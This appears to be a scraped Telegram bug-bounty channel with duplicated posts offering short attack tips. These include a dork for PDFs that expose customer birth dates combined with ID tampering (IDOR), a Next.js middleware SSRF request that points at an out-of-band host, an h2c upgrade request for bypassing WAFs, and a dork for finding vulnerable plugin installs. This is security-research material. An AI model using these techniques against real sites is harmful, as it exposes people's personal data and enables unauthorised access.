Hey Hunter's,
DarkShadow here back again, just dropping a awesome dork that makes pure bounty!
Unauthenticated Access to Sensitive Customer Data via Google Dorking
β Step to reproduce:
- dork:
site:*.target.com* "date of birth" ext:pdf
- Check if PDF file exposing customer data.
- Noticed the ID in the URL.
- if By changing the ID, you able to access other data.
Now guys let me know, you are want to know all dorks that make pure bounty?
If you guy's want then show your love, probably i made a tool for automation or post the method.
Follow for More x.com/darkshadow2bd
#bugbountytips #dork #idor
DarkShadow here back again, just dropping a awesome dork that makes pure bounty!
Unauthenticated Access to Sensitive Customer Data via Google Dorking
β Step to reproduce:
- dork:
site:*.target.com* "date of birth" ext:pdf
- Check if PDF file exposing customer data.
- Noticed the ID in the URL.
- if By changing the ID, you able to access other data.
Result: IDOR+Sensitive info leak (such as customer data)
Now guys let me know, you are want to know all dorks that make pure bounty?
If you guy's want then show your love, probably i made a tool for automation or post the method.
Follow for More x.com/darkshadow2bd
#bugbountytips #dork #idor
π₯11β€10π6π«‘3
CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 ratingβοΈ
The vulnerability allows attackers without authentication to make requests to arbitrary URLs.
Search at Netlas.io:
π Link: https://nt.ls/HthP0
π Dork: http.body:"plugins/ditty-news-ticker"
Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
The vulnerability allows attackers without authentication to make requests to arbitrary URLs.
Search at Netlas.io:
π Link: https://nt.ls/HthP0
π Dork: http.body:"plugins/ditty-news-ticker"
Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
π8π€1
Hey Hunter's,
DarkShadow here back again, dropping a critical SSRF π₯
Nextjs SSRF in Middleware header!
β POC:
If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd
#ssrf #bugbountytips
DarkShadow here back again, dropping a critical SSRF π₯
Nextjs SSRF in Middleware header!
β POC:
GET / HTTP/1.1
Host: target. com
Location: https://oast. me
X-Middleware-Rewrite: https://oast. me
If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd
#ssrf #bugbountytips
π18β€14π₯4πΏ1
Hey Hunter's,
DarkShadow here back again!
Check your burp isn't this feature is enable?
Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.
#bugbountytips #burp
DarkShadow here back again!
Check your burp isn't this feature is enable?
Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.
#bugbountytips #burp
1β€8π7π4π₯2
πͺ² Bug Bounty Pro Tip: #H2C Upgrade Bypass
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
1π₯29β€14π5
β‘S3Scan - A powerful S3 bucket security scanner designed for penetration testing and bug bounty hunting. This tool automatically detects misconfigurations and security vulnerabilities in AWS S3 buckets.
β https://github.com/KingOfBugbounty/s3tk
β https://github.com/KingOfBugbounty/s3tk
π20β€6π¨βπ»2
Mobile Hacking Bug Bounty.pdf
4.4 MB
Mobile Hacking Bug Bounty: The Practical Checklist
1π18π₯10β€2π2π³1
β‘Bug Bounty Reports Extractor - CLI tool that fetches resolved & disclosed HackerOne reports by vulnerability and exports them to CSV.
β https://github.com/newstartlikenoneanthor-pixel/report-extractor
β https://github.com/newstartlikenoneanthor-pixel/report-extractor
β€17π₯6π±2
Please open Telegram to view this post
VIEW IN TELEGRAM
Medium
Best Bug Bounty and Pentesting Methodology for Beginners: A Step-by-Step Guide
Bug bounty programs and penetration testing (pentesting) are popular ways for ethical hackers to make money while helping companies enhanceβ¦
1β€13π4π₯3π1
This media is not supported in your browser
VIEW IN TELEGRAM
"Β© <COMPANY>. all rights reserved." -".<COMPANY>.com"Please open Telegram to view this post
VIEW IN TELEGRAM
π₯17β€7π4π±1
Hey Hunter's,
DarkShadow here back again!
A hidden backdoor was in PHP version which allow remote code execution In user-agent header.
Guess Guy's which version it is?
#backdoor
DarkShadow here back again!
A hidden backdoor was in PHP version which allow remote code execution In user-agent header.
Guess Guy's which version it is?
#backdoor
β€19π2π¨βπ»1